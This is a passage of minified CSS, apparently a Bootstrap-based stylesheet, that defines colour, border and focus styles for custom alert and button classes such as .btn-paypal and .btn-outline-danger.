.alert-link{color:#0f4723}.alert-milka{color:#604e80;background-color:#f1eafd;border-color:#ebe2fd}.alert-milka hr{border-top-color:#dbcafb}.alert-milka .alert-link{color:#483b60}.alert-lightgray{color:#818181;background-color:#fefefe;border-color:#fdfdfd}.alert-lightgray hr{border-top-color:#f0f0f0}.alert-lightgray .alert-link{color:#686868}.alert-gradientyellow{color:#857b16;background-color:#fffbd4;border-color:#fffac3}.alert-gradientyellow hr{border-top-color:#fff8aa}.alert-gradientyellow .alert-link{color:#59530f}.alert-gradientblue{color:#648581;background-color:#f2fffe;border-color:#edfffd}.alert-gradientblue hr{border-top-color:#d4fffa}.alert-gradientblue .alert-link{color:#4e6865}.alert-ftimes{color:#857d77;background-color:#fffcfa;border-color:#fffbf8}.alert-ftimes hr{border-top-color:#ffecdf}.alert-ftimes .alert-link{color:#6a645f}.alert-planfree{color:#857161;background-color:#fff8f1;border-color:#fff5ec}.alert-planfree hr{border-top-color:#ffe8d3}.alert-planfree .alert-link{color:#68584b}.alert-legalnotepad{color:#848070;background-color:#fffdf7;border-color:#fffcf4}.alert-legalnotepad hr{border-top-color:#fff5db}.alert-legalnotepad .alert-link{color:#686559}.alert-excel{color:#08522e;background-color:#cfebde;border-color:#bce4d0}.alert-excel hr{border-top-color:#aaddc3}.alert-excel .alert-link{color:#032414}.alert-changelog{color:#252b30;background-color:#dadcdf;border-color:#cbcfd2}.alert-changelog hr{border-top-color:#bdc2c6}.alert-changelog .alert-link{color:#0f1113}.alert-pdfred{color:#782a2f;background-color:#fadcde;border-color:#f8ced1}.alert-pdfred hr{border-top-color:#f5b8bc}.alert-pdfred .alert-link{color:#521d20}.alert-mediumgrey{color:#646464;background-color:#f3f3f3;border-color:#eee}.alert-mediumgrey hr{border-top-color:#e1e1e1}.alert-mediumgrey .alert-link{color:#4b4b4b}.alert-paypal{color:#005173;background-color:#ccebf8;border-color:#b8e3f6}.alert-paypal hr{border-top-color:#a1daf3}.alert-paypal .alert-link{color:#002d40}.alert-newdarkgrey{color:#56595a;background-color:#edeeef;border-color:#e6e7e8}.alert-newdarkgrey hr{border-top-color:#d9dadc}.alert-newdarkgrey .alert-link{color:#3d3f40}.btn{display:inline-block;font-weight:400;color:#212529;text-align:center;vertical-align:middle;user-select:none;background-color:rgba(0,0,0,0);border:1px solid rgba(0,0,0,0);padding:.375rem .75rem;font-size:1rem;line-height:1.5;border-radius:.25rem;transition:color .15s ease-in-out,background-color .15s ease-in-out,border-color .15s ease-in-out,box-shadow .15s ease-in-out}@media(prefers-reduced-motion: reduce){.btn{transition:none}}.btn:hover{color:#212529;text-decoration:none}.btn:focus,.btn.focus{outline:0;box-shadow:0 0 0 .2rem rgba(31,187,255,.25)}.btn.disabled,.btn:disabled{opacity:.65}.btn:not(:disabled):not(.disabled){cursor:pointer}a.btn.disabled,fieldset:disabled a.btn{pointer-events:none}.btn-primary{color:#fff;background-color:#1fbbff;border-color:#1fbbff}.btn-primary:hover{color:#fff;background-color:#00adf8;border-color:#00a4eb}.btn-primary:focus,.btn-primary.focus{color:#fff;background-color:#00adf8;border-color:#00a4eb;box-shadow:0 0 0 .2rem rgba(65,197,255,.5)}.btn-primary.disabled,.btn-primary:disabled{color:#fff;background-color:#1fbbff;border-color:#1fbbff}.btn-primary:not(:disabled):not(.disabled):active,.btn-primary:not(:disabled):not(.disabled).active,.show>.btn-primary.dropdown-toggle{color:#fff;background-color:#00a4eb;border-color:#009bde}.btn-primary:not(:disabled):not(.disabled):active:focus,.btn-primary:not(:disabled):not(.disabled).active:focus,.show>.btn-primary.dropdown-toggle:focus{box-shadow:0 0 0 .2rem rgba(65,197,255,.5)}.btn-secondary{color:#fff;background-color:#888;border-color:#888}.btn-secondary:hover{color:#fff;background-color:#757575;border-color:#6f6f6f}.btn-secondary:focus,.btn-secondary.focus{color:#fff;background-color:#757575;border-color:#6f6f6f;box-shadow:0 0 0 .2rem rgba(154,154,154,.5)}.btn-secondary.disabled,.btn-secondary:disabled{color:#fff;background-color:#888;border-color:#888}.btn-secondary:not(:disabled):not(.disabled):active,.btn-secondary:not(:disabled):not(.disabled).active,.show>.btn-secondary.dropdown-toggle{color:#fff;background-color:#6f6f6f;border-color:#686868}.btn-secondary:not(:disabled):not(.disabled):active:focus,.btn-secondary:not(:disabled):not(.disabled).active:focus,.show>.btn-secondary.dropdown-toggle:focus{box-shadow:0 0 0 .2rem rgba(154,154,154,.5)}.btn-success{color:#fff;background-color:#28a745;border-color:#28a745}.btn-success:hover{color:#fff;background-color:#218838;border-color:#1e7e34}.btn-success:focus,.btn-success.focus{color:#fff;background-color:#218838;border-color:#1e7e34;box-shadow:0 0 0 .2rem rgba(72,180,97,.5)}.btn-success.disabled,.btn-success:disabled{color:#fff;background-color:#28a745;border-color:#28a745}.btn-success:not(:disabled):not(.disabled):active,.btn-success:not(:disabled):not(.disabled).active,.show>.btn-success.dropdown-toggle{color:#fff;background-color:#1e7e34;border-color:#1c7430}.btn-success:not(:disabled):not(.disabled):active:focus,.btn-success:not(:disabled):not(.disabled).active:focus,.show>.btn-success.dropdown-toggle:focus{box-shadow:0 0 0 .2rem rgba(72,180,97,.5)}.btn-info{color:#fff;background-color:#17a2b8;border-color:#17a2b8}.btn-info:hover{color:#fff;background-color:#138496;border-color:#117a8b}.btn-info:focus,.btn-info.focus{color:#fff;background-color:#138496;border-color:#117a8b;box-shadow:0 0 0 .2rem rgba(58,176,195,.5)}.btn-info.disabled,.btn-info:disabled{color:#fff;background-color:#17a2b8;border-color:#17a2b8}.btn-info:not(:disabled):not(.disabled):active,.btn-info:not(:disabled):not(.disabled).active,.show>.btn-info.dropdown-toggle{color:#fff;background-color:#117a8b;border-color:#10707f}.btn-info:not(:disabled):not(.disabled):active:focus,.btn-info:not(:disabled):not(.disabled).active:focus,.show>.btn-info.dropdown-toggle:focus{box-shadow:0 0 0 .2rem rgba(58,176,195,.5)}.btn-warning{color:#212529;background-color:#ffc107;border-color:#ffc107}.btn-warning:hover{color:#212529;background-color:#e0a800;border-color:#d39e00}.btn-warning:focus,.btn-warning.focus{color:#212529;background-color:#e0a800;border-color:#d39e00;box-shadow:0 0 0 .2rem rgba(222,170,12,.5)}.btn-warning.disabled,.btn-warning:disabled{color:#212529;background-color:#ffc107;border-color:#ffc107}.btn-warning:not(:disabled):not(.disabled):active,.btn-warning:not(:disabled):not(.disabled).active,.show>.btn-warning.dropdown-toggle{color:#212529;background-color:#d39e00;border-color:#c69500}.btn-warning:not(:disabled):not(.disabled):active:focus,.btn-warning:not(:disabled):not(.disabled).active:focus,.show>.btn-warning.dropdown-toggle:focus{box-shadow:0 0 0 .2rem rgba(222,170,12,.5)}.btn-danger{color:#fff;background-color:#dc3545;border-color:#dc3545}.btn-danger:hover{color:#fff;background-color:#c82333;border-color:#bd2130}.btn-danger:focus,.btn-danger.focus{color:#fff;background-color:#c82333;border-color:#bd2130;box-shadow:0 0 0 .2rem rgba(225,83,97,.5)}.btn-danger.disabled,.btn-danger:disabled{color:#fff;background-color:#dc3545;border-color:#dc3545}.btn-danger:not(:disabled):not(.disabled):active,.btn-danger:not(:disabled):not(.disabled).active,.show>.btn-danger.dropdown-toggle{color:#fff;background-color:#bd2130;border-color:#b21f2d}.btn-danger:not(:disabled):not(.disabled):active:focus,.btn-danger:not(:disabled):not(.disabled).active:focus,.show>.btn-danger.dropdown-toggle:focus{box-shadow:0 0 0 .2rem rgba(225,83,97,.5)}.btn-light{color:#212529;background-color:#fcf8f4;border-color:#fcf8f4}.btn-light:hover{color:#212529;background-color:#f4e5d6;border-color:#f1dfcc}.btn-light:focus,.btn-light.focus{color:#212529;background-color:#f4e5d6;border-color:#f1dfcc;box-shadow:0 0 0 .2rem rgba(219,216,214,.5)}.btn-light.disabled,.btn-light:disabled{color:#212529;background-color:#fcf8f4;border-color:#fcf8f4}.btn-light:not(:disabled):not(.disabled):active,.btn-light:not(:disabled):not(.disabled).active,.show>.btn-light.dropdown-toggle{color:#212529;background-color:#f1dfcc;border-color:#eed8c2}.btn-light:not(:disabled):not(.disabled):active:focus,.btn-light:not(:disabled):not(.disabled).active:focus,.show>.btn-light.dropdown-toggle:focus{box-shadow:0 0 0 .2rem rgba(219,216,214,.5)}.btn-dark{color:#fff;background-color:#343a40;border-color:#343a40}.btn-dark:hover{color:#fff;background-color:#23272b;border-color:#1d2124}.btn-dark:focus,.btn-dark.focus{color:#fff;background-color:#23272b;border-color:#1d2124;box-shadow:0 0 0 .2rem rgba(82,88,93,.5)}.btn-dark.disabled,.btn-dark:disabled{color:#fff;background-color:#343a40;border-color:#343a40}.btn-dark:not(:disabled):not(.disabled):active,.btn-dark:not(:disabled):not(.disabled).active,.show>.btn-dark.dropdown-toggle{color:#fff;background-color:#1d2124;border-color:#171a1d}.btn-dark:not(:disabled):not(.disabled):active:focus,.btn-dark:not(:disabled):not(.disabled).active:focus,.show>.btn-dark.dropdown-toggle:focus{box-shadow:0 0 0 .2rem rgba(82,88,93,.5)}.btn-black{color:#fff;background-color:#000;border-color:#000}.btn-black:hover{color:#fff;background-color:#000;border-color:#000}.btn-black:focus,.btn-black.focus{color:#fff;background-color:#000;border-color:#000;box-shadow:0 0 0 .2rem rgba(38,38,38,.5)}.btn-black.disabled,.btn-black:disabled{color:#fff;background-color:#000;border-color:#000}.btn-black:not(:disabled):not(.disabled):active,.btn-black:not(:disabled):not(.disabled).active,.show>.btn-black.dropdown-toggle{color:#fff;background-color:#000;border-color:#000}.btn-black:not(:disabled):not(.disabled):active:focus,.btn-black:not(:disabled):not(.disabled).active:focus,.show>.btn-black.dropdown-toggle:focus{box-shadow:0 0 0 .2rem rgba(38,38,38,.5)}.btn-darkgrey{color:#fff;background-color:#221f1f;border-color:#221f1f}.btn-darkgrey:hover{color:#fff;background-color:#0e0d0d;border-color:#070707}.btn-darkgrey:focus,.btn-darkgrey.focus{color:#fff;background-color:#0e0d0d;border-color:#070707;box-shadow:0 0 0 .2rem rgba(67,65,65,.5)}.btn-darkgrey.disabled,.btn-darkgrey:disabled{color:#fff;background-color:#221f1f;border-color:#221f1f}.btn-darkgrey:not(:disabled):not(.disabled):active,.btn-darkgrey:not(:disabled):not(.disabled).active,.show>.btn-darkgrey.dropdown-toggle{color:#fff;background-color:#070707;border-color:#010101}.btn-darkgrey:not(:disabled):not(.disabled):active:focus,.btn-darkgrey:not(:disabled):not(.disabled).active:focus,.show>.btn-darkgrey.dropdown-toggle:focus{box-shadow:0 0 0 .2rem rgba(67,65,65,.5)}.btn-sublime{color:#fff;background-color:#2a303c;border-color:#2a303c}.btn-sublime:hover{color:#fff;background-color:#1a1e26;border-color:#15181e}.btn-sublime:focus,.btn-sublime.focus{color:#fff;background-color:#1a1e26;border-color:#15181e;box-shadow:0 0 0 .2rem rgba(74,79,89,.5)}.btn-sublime.disabled,.btn-sublime:disabled{color:#fff;background-color:#2a303c;border-color:#2a303c}.btn-sublime:not(:disabled):not(.disabled):active,.btn-sublime:not(:disabled):not(.disabled).active,.show>.btn-sublime.dropdown-toggle{color:#fff;background-color:#15181e;border-color:#101217}.btn-sublime:not(:disabled):not(.disabled):active:focus,.btn-sublime:not(:disabled):not(.disabled).active:focus,.show>.btn-sublime.dropdown-toggle:focus{box-shadow:0 0 0 .2rem rgba(74,79,89,.5)}.btn-neongreen{color:#212529;background-color:#2eda6b;border-color:#2eda6b}.btn-neongreen:hover{color:#fff;background-color:#22c05a;border-color:#20b555}.btn-neongreen:focus,.btn-neongreen.focus{color:#fff;background-color:#22c05a;border-color:#20b555;box-shadow:0 0 0 .2rem rgba(44,191,97,.5)}.btn-neongreen.disabled,.btn-neongreen:disabled{color:#212529;background-color:#2eda6b;border-color:#2eda6b}.btn-neongreen:not(:disabled):not(.disabled):active,.btn-neongreen:not(:disabled):not(.disabled).active,.show>.btn-neongreen.dropdown-toggle{color:#fff;background-color:#20b555;border-color:#1eaa50}.btn-neongreen:not(:disabled):not(.disabled):active:focus,.btn-neongreen:not(:disabled):not(.disabled).active:focus,.show>.btn-neongreen.dropdown-toggle:focus{box-shadow:0 0 0 .2rem rgba(44,191,97,.5)}.btn-milka{color:#212529;background-color:#b996f7;border-color:#b996f7}.btn-milka:hover{color:#fff;background-color:#a172f4;border-color:#9967f3}.btn-milka:focus,.btn-milka.focus{color:#fff;background-color:#a172f4;border-color:#9967f3;box-shadow:0 0 0 .2rem rgba(162,133,216,.5)}.btn-milka.disabled,.btn-milka:disabled{color:#212529;background-color:#b996f7;border-color:#b996f7}.btn-milka:not(:disabled):not(.disabled):active,.btn-milka:not(:disabled):not(.disabled).active,.show>.btn-milka.dropdown-toggle{color:#fff;background-color:#9967f3;border-color:#925bf2}.btn-milka:not(:disabled):not(.disabled):active:focus,.btn-milka:not(:disabled):not(.disabled).active:focus,.show>.btn-milka.dropdown-toggle:focus{box-shadow:0 0 0 .2rem rgba(162,133,216,.5)}.btn-lightgray{color:#212529;background-color:#f9f9f9;border-color:#f9f9f9}.btn-lightgray:hover{color:#212529;background-color:#e6e6e6;border-color:#e0e0e0}.btn-lightgray:focus,.btn-lightgray.focus{color:#212529;background-color:#e6e6e6;border-color:#e0e0e0;box-shadow:0 0 0 .2rem rgba(217,217,218,.5)}.btn-lightgray.disabled,.btn-lightgray:disabled{color:#212529;background-color:#f9f9f9;border-color:#f9f9f9}.btn-lightgray:not(:disabled):not(.disabled):active,.btn-lightgray:not(:disabled):not(.disabled).active,.show>.btn-lightgray.dropdown-toggle{color:#212529;background-color:#e0e0e0;border-color:#d9d9d9}.btn-lightgray:not(:disabled):not(.disabled):active:focus,.btn-lightgray:not(:disabled):not(.disabled).active:focus,.show>.btn-lightgray.dropdown-toggle:focus{box-shadow:0 0 0 .2rem rgba(217,217,218,.5)}.btn-gradientyellow{color:#212529;background-color:#ffed2a;border-color:#ffed2a}.btn-gradientyellow:hover{color:#212529;background-color:#ffea04;border-color:#f6e100}.btn-gradientyellow:focus,.btn-gradientyellow.focus{color:#212529;background-color:#ffea04;border-color:#f6e100;box-shadow:0 0 0 .2rem rgba(222,207,42,.5)}.btn-gradientyellow.disabled,.btn-gradientyellow:disabled{color:#212529;background-color:#ffed2a;border-color:#ffed2a}.btn-gradientyellow:not(:disabled):not(.disabled):active,.btn-gradientyellow:not(:disabled):not(.disabled).active,.show>.btn-gradientyellow.dropdown-toggle{color:#212529;background-color:#f6e100;border-color:#e9d600}.btn-gradientyellow:not(:disabled):not(.disabled):active:focus,.btn-gradientyellow:not(:disabled):not(.disabled).active:focus,.show>.btn-gradientyellow.dropdown-toggle:focus{box-shadow:0 0 0 .2rem rgba(222,207,42,.5)}.btn-gradientblue{color:#212529;background-color:#c0fff8;border-color:#c0fff8}.btn-gradientblue:hover{color:#212529;background-color:#9afff4;border-color:#8dfff2}.btn-gradientblue:focus,.btn-gradientblue.focus{color:#212529;background-color:#9afff4;border-color:#8dfff2;box-shadow:0 0 0 .2rem rgba(168,222,217,.5)}.btn-gradientblue.disabled,.btn-gradientblue:disabled{color:#212529;background-color:#c0fff8;border-color:#c0fff8}.btn-gradientblue:not(:disabled):not(.disabled):active,.btn-gradientblue:not(:disabled):not(.disabled).active,.show>.btn-gradientblue.dropdown-toggle{color:#212529;background-color:#8dfff2;border-color:#80fff1}.btn-gradientblue:not(:disabled):not(.disabled):active:focus,.btn-gradientblue:not(:disabled):not(.disabled).active:focus,.show>.btn-gradientblue.dropdown-toggle:focus{box-shadow:0 0 0 .2rem rgba(168,222,217,.5)}.btn-ftimes{color:#212529;background-color:#fff1e5;border-color:#fff1e5}.btn-ftimes:hover{color:#212529;background-color:#ffdcbf;border-color:#ffd6b2}.btn-ftimes:focus,.btn-ftimes.focus{color:#212529;background-color:#ffdcbf;border-color:#ffd6b2;box-shadow:0 0 0 .2rem rgba(222,210,201,.5)}.btn-ftimes.disabled,.btn-ftimes:disabled{color:#212529;background-color:#fff1e5;border-color:#fff1e5}.btn-ftimes:not(:disabled):not(.disabled):active,.btn-ftimes:not(:disabled):not(.disabled).active,.show>.btn-ftimes.dropdown-toggle{color:#212529;background-color:#ffd6b2;border-color:#ffcfa5}.btn-ftimes:not(:disabled):not(.disabled):active:focus,.btn-ftimes:not(:disabled):not(.disabled).active:focus,.show>.btn-ftimes.dropdown-toggle:focus{box-shadow:0 0 0 .2rem rgba(222,210,201,.5)}.btn-planfree{color:#212529;background-color:#ffdabb;border-color:#ffdabb}.btn-planfree:hover{color:#212529;background-color:#ffc595;border-color:#ffbe88}.btn-planfree:focus,.btn-planfree.focus{color:#212529;background-color:#ffc595;border-color:#ffbe88;box-shadow:0 0 0 .2rem rgba(222,191,165,.5)}.btn-planfree.disabled,.btn-planfree:disabled{color:#212529;background-color:#ffdabb;border-color:#ffdabb}.btn-planfree:not(:disabled):not(.disabled):active,.btn-planfree:not(:disabled):not(.disabled).active,.show>.btn-planfree.dropdown-toggle{color:#212529;background-color:#ffbe88;border-color:#ffb77b}.btn-planfree:not(:disabled):not(.disabled):active:focus,.btn-planfree:not(:disabled):not(.disabled).active:focus,.show>.btn-planfree.dropdown-toggle:focus{box-shadow:0 0 0 .2rem rgba(222,191,165,.5)}.btn-legalnotepad{color:#212529;background-color:#fef6d8;border-color:#fef6d8}.btn-legalnotepad:hover{color:#212529;background-color:#fdedb3;border-color:#fdeba6}.btn-legalnotepad:focus,.btn-legalnotepad.focus{color:#212529;background-color:#fdedb3;border-color:#fdeba6;box-shadow:0 0 0 .2rem rgba(221,215,190,.5)}.btn-legalnotepad.disabled,.btn-legalnotepad:disabled{color:#212529;background-color:#fef6d8;border-color:#fef6d8}.btn-legalnotepad:not(:disabled):not(.disabled):active,.btn-legalnotepad:not(:disabled):not(.disabled).active,.show>.btn-legalnotepad.dropdown-toggle{color:#212529;background-color:#fdeba6;border-color:#fce89a}.btn-legalnotepad:not(:disabled):not(.disabled):active:focus,.btn-legalnotepad:not(:disabled):not(.disabled).active:focus,.show>.btn-legalnotepad.dropdown-toggle:focus{box-shadow:0 0 0 .2rem rgba(221,215,190,.5)}.btn-excel{color:#fff;background-color:#0f9d58;border-color:#0f9d58}.btn-excel:hover{color:#fff;background-color:#0c7a44;border-color:#0b6e3e}.btn-excel:focus,.btn-excel.focus{color:#fff;background-color:#0c7a44;border-color:#0b6e3e;box-shadow:0 0 0 .2rem rgba(51,172,113,.5)}.btn-excel.disabled,.btn-excel:disabled{color:#fff;background-color:#0f9d58;border-color:#0f9d58}.btn-excel:not(:disabled):not(.disabled):active,.btn-excel:not(:disabled):not(.disabled).active,.show>.btn-excel.dropdown-toggle{color:#fff;background-color:#0b6e3e;border-color:#096337}.btn-excel:not(:disabled):not(.disabled):active:focus,.btn-excel:not(:disabled):not(.disabled).active:focus,.show>.btn-excel.dropdown-toggle:focus{box-shadow:0 0 0 .2rem rgba(51,172,113,.5)}.btn-changelog{color:#fff;background-color:#47525d;border-color:#47525d}.btn-changelog:hover{color:#fff;background-color:#363f47;border-color:#313940}.btn-changelog:focus,.btn-changelog.focus{color:#fff;background-color:#363f47;border-color:#313940;box-shadow:0 0 0 .2rem rgba(99,108,117,.5)}.btn-changelog.disabled,.btn-changelog:disabled{color:#fff;background-color:#47525d;border-color:#47525d}.btn-changelog:not(:disabled):not(.disabled):active,.btn-changelog:not(:disabled):not(.disabled).active,.show>.btn-changelog.dropdown-toggle{color:#fff;background-color:#313940;border-color:#2b3239}.btn-changelog:not(:disabled):not(.disabled):active:focus,.btn-changelog:not(:disabled):not(.disabled).active:focus,.show>.btn-changelog.dropdown-toggle:focus{box-shadow:0 0 0 .2rem rgba(99,108,117,.5)}.btn-pdfred{color:#fff;background-color:#e7505a;border-color:#e7505a}.btn-pdfred:hover{color:#fff;background-color:#e22e3a;border-color:#e12330}.btn-pdfred:focus,.btn-pdfred.focus{color:#fff;background-color:#e22e3a;border-color:#e12330;box-shadow:0 0 0 .2rem rgba(235,106,115,.5)}.btn-pdfred.disabled,.btn-pdfred:disabled{color:#fff;background-color:#e7505a;border-color:#e7505a}.btn-pdfred:not(:disabled):not(.disabled):active,.btn-pdfred:not(:disabled):not(.disabled).active,.show>.btn-pdfred.dropdown-toggle{color:#fff;background-color:#e12330;border-color:#d91e2a}.btn-pdfred:not(:disabled):not(.disabled):active:focus,.btn-pdfred:not(:disabled):not(.disabled).active:focus,.show>.btn-pdfred.dropdown-toggle:focus{box-shadow:0 0 0 .2rem rgba(235,106,115,.5)}.btn-mediumgrey{color:#212529;background-color:#c1c1c1;border-color:#c1c1c1}.btn-mediumgrey:hover{color:#212529;background-color:#aeaeae;border-color:#a8a8a8}.btn-mediumgrey:focus,.btn-mediumgrey.focus{color:#212529;background-color:#aeaeae;border-color:#a8a8a8;box-shadow:0 0 0 .2rem rgba(169,170,170,.5)}.btn-mediumgrey.disabled,.btn-mediumgrey:disabled{color:#212529;background-color:#c1c1c1;border-color:#c1c1c1}.btn-mediumgrey:not(:disabled):not(.disabled):active,.btn-mediumgrey:not(:disabled):not(.disabled).active,.show>.btn-mediumgrey.dropdown-toggle{color:#212529;background-color:#a8a8a8;border-color:#a1a1a1}.btn-mediumgrey:not(:disabled):not(.disabled):active:focus,.btn-mediumgrey:not(:disabled):not(.disabled).active:focus,.show>.btn-mediumgrey.dropdown-toggle:focus{box-shadow:0 0 0 .2rem rgba(169,170,170,.5)}.btn-paypal{color:#fff;background-color:#009cde;border-color:#009cde}.btn-paypal:hover{color:#fff;background-color:#0081b8;border-color:#0078ab}.btn-paypal:focus,.btn-paypal.focus{color:#fff;background-color:#0081b8;border-color:#0078ab;box-shadow:0 0 0 .2rem rgba(38,171,227,.5)}.btn-paypal.disabled,.btn-paypal:disabled{color:#fff;background-color:#009cde;border-color:#009cde}.btn-paypal:not(:disabled):not(.disabled):active,.btn-paypal:not(:disabled):not(.disabled).active,.show>.btn-paypal.dropdown-toggle{color:#fff;background-color:#0078ab;border-color:#006f9e}.btn-paypal:not(:disabled):not(.disabled):active:focus,.btn-paypal:not(:disabled):not(.disabled).active:focus,.show>.btn-paypal.dropdown-toggle:focus{box-shadow:0 0 0 .2rem rgba(38,171,227,.5)}.btn-newdarkgrey{color:#212529;background-color:#a6abad;border-color:#a6abad}.btn-newdarkgrey:hover{color:#212529;background-color:#92989b;border-color:#8b9295}.btn-newdarkgrey:focus,.btn-newdarkgrey.focus{color:#212529;background-color:#92989b;border-color:#8b9295;box-shadow:0 0 0 .2rem rgba(146,151,153,.5)}.btn-newdarkgrey.disabled,.btn-newdarkgrey:disabled{color:#212529;background-color:#a6abad;border-color:#a6abad}.btn-newdarkgrey:not(:disabled):not(.disabled):active,.btn-newdarkgrey:not(:disabled):not(.disabled).active,.show>.btn-newdarkgrey.dropdown-toggle{color:#fff;background-color:#8b9295;border-color:#858c8e}.btn-newdarkgrey:not(:disabled):not(.disabled):active:focus,.btn-newdarkgrey:not(:disabled):not(.disabled).active:focus,.show>.btn-newdarkgrey.dropdown-toggle:focus{box-shadow:0 0 0 .2rem rgba(146,151,153,.5)}.btn-outline-primary{color:#1fbbff;border-color:#1fbbff}.btn-outline-primary:hover{color:#fff;background-color:#1fbbff;border-color:#1fbbff}.btn-outline-primary:focus,.btn-outline-primary.focus{box-shadow:0 0 0 .2rem rgba(31,187,255,.5)}.btn-outline-primary.disabled,.btn-outline-primary:disabled{color:#1fbbff;background-color:rgba(0,0,0,0)}.btn-outline-primary:not(:disabled):not(.disabled):active,.btn-outline-primary:not(:disabled):not(.disabled).active,.show>.btn-outline-primary.dropdown-toggle{color:#fff;background-color:#1fbbff;border-color:#1fbbff}.btn-outline-primary:not(:disabled):not(.disabled):active:focus,.btn-outline-primary:not(:disabled):not(.disabled).active:focus,.show>.btn-outline-primary.dropdown-toggle:focus{box-shadow:0 0 0 .2rem rgba(31,187,255,.5)}.btn-outline-secondary{color:#888;border-color:#888}.btn-outline-secondary:hover{color:#fff;background-color:#888;border-color:#888}.btn-outline-secondary:focus,.btn-outline-secondary.focus{box-shadow:0 0 0 .2rem rgba(136,136,136,.5)}.btn-outline-secondary.disabled,.btn-outline-secondary:disabled{color:#888;background-color:rgba(0,0,0,0)}.btn-outline-secondary:not(:disabled):not(.disabled):active,.btn-outline-secondary:not(:disabled):not(.disabled).active,.show>.btn-outline-secondary.dropdown-toggle{color:#fff;background-color:#888;border-color:#888}.btn-outline-secondary:not(:disabled):not(.disabled):active:focus,.btn-outline-secondary:not(:disabled):not(.disabled).active:focus,.show>.btn-outline-secondary.dropdown-toggle:focus{box-shadow:0 0 0 .2rem rgba(136,136,136,.5)}.btn-outline-success{color:#28a745;border-color:#28a745}.btn-outline-success:hover{color:#fff;background-color:#28a745;border-color:#28a745}.btn-outline-success:focus,.btn-outline-success.focus{box-shadow:0 0 0 .2rem rgba(40,167,69,.5)}.btn-outline-success.disabled,.btn-outline-success:disabled{color:#28a745;background-color:rgba(0,0,0,0)}.btn-outline-success:not(:disabled):not(.disabled):active,.btn-outline-success:not(:disabled):not(.disabled).active,.show>.btn-outline-success.dropdown-toggle{color:#fff;background-color:#28a745;border-color:#28a745}.btn-outline-success:not(:disabled):not(.disabled):active:focus,.btn-outline-success:not(:disabled):not(.disabled).active:focus,.show>.btn-outline-success.dropdown-toggle:focus{box-shadow:0 0 0 .2rem rgba(40,167,69,.5)}.btn-outline-info{color:#17a2b8;border-color:#17a2b8}.btn-outline-info:hover{color:#fff;background-color:#17a2b8;border-color:#17a2b8}.btn-outline-info:focus,.btn-outline-info.focus{box-shadow:0 0 0 .2rem rgba(23,162,184,.5)}.btn-outline-info.disabled,.btn-outline-info:disabled{color:#17a2b8;background-color:rgba(0,0,0,0)}.btn-outline-info:not(:disabled):not(.disabled):active,.btn-outline-info:not(:disabled):not(.disabled).active,.show>.btn-outline-info.dropdown-toggle{color:#fff;background-color:#17a2b8;border-color:#17a2b8}.btn-outline-info:not(:disabled):not(.disabled):active:focus,.btn-outline-info:not(:disabled):not(.disabled).active:focus,.show>.btn-outline-info.dropdown-toggle:focus{box-shadow:0 0 0 .2rem rgba(23,162,184,.5)}.btn-outline-warning{color:#ffc107;border-color:#ffc107}.btn-outline-warning:hover{color:#212529;background-color:#ffc107;border-color:#ffc107}.btn-outline-warning:focus,.btn-outline-warning.focus{box-shadow:0 0 0 .2rem rgba(255,193,7,.5)}.btn-outline-warning.disabled,.btn-outline-warning:disabled{color:#ffc107;background-color:rgba(0,0,0,0)}.btn-outline-warning:not(:disabled):not(.disabled):active,.btn-outline-warning:not(:disabled):not(.disabled).active,.show>.btn-outline-warning.dropdown-toggle{color:#212529;background-color:#ffc107;border-color:#ffc107}.btn-outline-warning:not(:disabled):not(.disabled):active:focus,.btn-outline-warning:not(:disabled):not(.disabled).active:focus,.show>.btn-outline-warning.dropdown-toggle:focus{box-shadow:0 0 0 .2rem rgba(255,193,7,.5)}.btn-outline-danger{color:#dc3545;border-color:#dc3545}.btn-outline-danger:hover{color:#fff;background-color:#dc3545;border-color:#dc3545}.btn-outline-danger:focus,.btn-outline-danger.focus{box-shadow:0 0 0 .2rem rgba(220,53,69,.5)}.btn-outline-danger.disabled,.btn-outline-danger:disabled{color:#dc3545;background-color:rgba(0,0,0,0)}.btn-outline-danger:not(:disabled):not(.disabled):active,.btn-outline-danger:not(:disabled):not(.disabled).active,.show>.btn-outline-danger.dropdown-toggle{color:#fff;background-color:#dc3545;border-color:#dc3545}.btn-outline-danger:not(:disabled):not(.disabled):active:focus,.btn-outline-danger:not(:disabled):not(.disabled).active:focus,.show>.btn-outline-danger.dropdown-toggle:focus{box-shadow:0 0 0 .2rem rgba(220,53,69,.5)}.btn-outline-light{color:#fcf8f4;border-color:#fcf8f4}.btn-outline-light:hover{color:#212529;background-color:#fcf8f4;border-color:#fcf8f4}.btn-outline-light:focus,.btn-outline-light.focus{box-shadow:0 0 0 .2rem rgba(252,248,244,.5)}.btn-outline-light.disabled,.btn-outline-light:disabled{color:#fcf8f4;background-color:rgba(0,0,0,0)}.btn-outline-light:not(:disabled):not(.disabled):active,.btn-outline-light:not(:disabled):not(.disabled).active,.show>.btn-outline-light.dropdown-toggle{color:#212529;background-color:#fcf8f4;border-color:#fcf8f4}.btn-outline-light:not(:disabled):not(.disabled):active:focus,.btn-outline-light:not(:disabled):not(.disabled).active:focus,.show>.btn-outline-light.dropdown-toggle:focus{box-shadow:0 0 0 .2rem rgba(252,248,244,.5)}.btn-outline-dark{color:#343a40;border-color:#343a40}.btn-outline-dark:hover{color:#fff;background-color:#343a40;border-color:#343a40}.btn-outline-dark:focus,.btn-outline-dark.focus{box-shadow:0 0 0 .2rem rgba(52,58,64,.5)}.btn-outline-dark.disabled,.btn-outline-dark:disabled{color:#343a40;background-color:rgba(0,0,0,0)}.btn-outline-dark:not(:disabled):not(.disabled):active,.btn-outline-dark:not(:disabled):not(.disabled).active,.show>.btn-outline-dark.dropdown-toggle{color:#fff;background-color:#343a40;border-color:#343a40}.btn-outline-dark:not(:disabled):not(.disabled):active:focus,.btn-outline-dark:not(:disabled):not(.disabled).active:focus,.show>.btn-outline-dark.dropdown-toggle:focus{box-shadow:0 0 0 .2rem rgba(52,58,64,.5)}.btn-outline-black{color:#000;border-color:#000}.btn-outline-black:hover{color:#fff;background-color:#000;border-color:#000}.btn-outline-black:focus,.btn-outline-black.focus{box-shadow:0 0 0 .2rem rgba(0,0,0,.5)}.btn-outline-black.disabled,.btn-outline-black:disabled{color:#000;background-color:rgba(0,0,0,0)}.btn-outline-black:not(:disabled):not(.disabled):active,.btn-outline-black:not(:disabled):not(.disabled).active,.show>.btn-outline-black.dropdown-toggle{color:#fff;background-color:#000;border-color:#000}.btn-outline-black:not(:disabled):not(.disabled):active:focus,.btn-outline-black:not(:disabled):not(.disabled).active:focus,.show>.btn-outline-black.dropdown-toggle:focus{box-shadow:0 0 0 .2rem 